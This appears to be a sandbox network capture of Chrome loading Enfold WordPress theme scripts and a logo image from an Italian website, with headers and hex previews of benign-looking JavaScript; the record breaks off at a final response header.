                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC670OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2497
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC2497INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 47 61 6c 6c 65 72 79 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Gallery shortcode javascript// -----------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              95192.168.2.164982389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC444OUTGET /wp-content/uploads/2019/05/Cipasso_simbolo3.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC271INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 25096
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Tue, 28 May 2019 12:42:53 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC16113INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4d 00 00 00 32 08 06 00 00 00 d8 f3 89 64 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a ac 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da ad 96 77 54 93 59 1a c6 df ef fb d2 0b 2d 21 02 52 42 6f 82 14 e9 d2 6b e8 d2 c1 46 48 20 09 84 18 42 82 8a a8 a8 0c 8e e0 58 10 11 01 65 44 46 44 14 1c 0b 20 63 41 2c 58 18 04 7b 1f 90 41 45 5d 07 0b 36 54 f6 0f 96 b0 7b 76 f7 8f 3d 67 df 73 ee 39 bf f3 9c 7b 9f fb be f7 fe f3 00 d0 4e 72 a5 52 31 aa 06 90 2d 91 cb 62 82 fd d8 49 c9 29 6c e2 10 20 80 01 80 15 90 b8 bc 5c a9 6f 74 74 38 fc d7 fa 70 1b 10 00 80 1b 36 5c a9 54 0c ff 5b a9 f3 d3 73 79 00 48 34 00 a4 f1 73 79 d9 00 c8 31 00 a4 9e 27 95
                                                                                                                                              Data Ascii: PNGIHDRM2dpHYsiCCPPhotoshop ICC profilexwTY-!RBokFH BXeDFD cA,X{AE]6T{v=gs9{NrR1-bI)l \ott8p6\T[syH4sy1'
                                                                                                                                              2025-01-03 16:33:04 UTC8983INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                              Data Ascii:


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              96192.168.2.164982489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC692OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 5081
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC5081INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 48 6f 72 69 7a 6f 6e 74 61 6c 20 47 61 6c 6c 65 72 79 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Horizontal Gallery// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              97192.168.2.164982589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC688OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 4975
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC4975INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 41 76 69 61 20 54 65 78 74 20 52 6f 74 61 74 6f 72 0a 09 2f 2f 20 0a 09 2f 2f 20 61 63 63 6f 72 64 69 6f 6e 20 73 6c 69 64 65 72 20 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Avia Text Rotator// // accordion slider script// -------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              98192.168.2.164982789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC672OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 1848
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC1848INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 09 09 24 28 27 2e 61 76 69 61 2d 69 63 6f 6e 67 72 69 64 2d 66 6c 69 70 62 6f 78 27 29 2e 61 76 69 61 5f 73 63 5f 69 63 6f 6e 67 72 69 64 28 29 3b 0a 20 20 20 20 7d 29 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 49 63 6f 6e 67 72 69 64 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(window).on('load', function (e) {$('.avia-icongrid-flipbox').avia_sc_icongrid(); });// -------------------------------------------------------------------------------------------// Icongrid shortcode java


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              99192.168.2.164982689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC499OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2080
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC2080INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 50 6c 61 79 65 72 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 76 61 72 20 61 75 74 6f
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Player// // -------------------------------------------------------------------------------------------(function($){ "use strict";var auto


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              100192.168.2.164982889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC489OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 7813
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC7813INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 61 6a 61 78 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 61 6a 61 78 5f 66 6f 72 6d 20 3d 20 66 75 6e 63 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// contact form ajax// -------------------------------------------------------------------------------------------(function($){$.fn.avia_ajax_form = funct


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              101192.168.2.164983189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC672OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 685
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC685INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 49 63 6f 6e 6c 69 73 74 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Iconlist shortcode javascript// ----------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              102192.168.2.164983089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC684OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 784
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
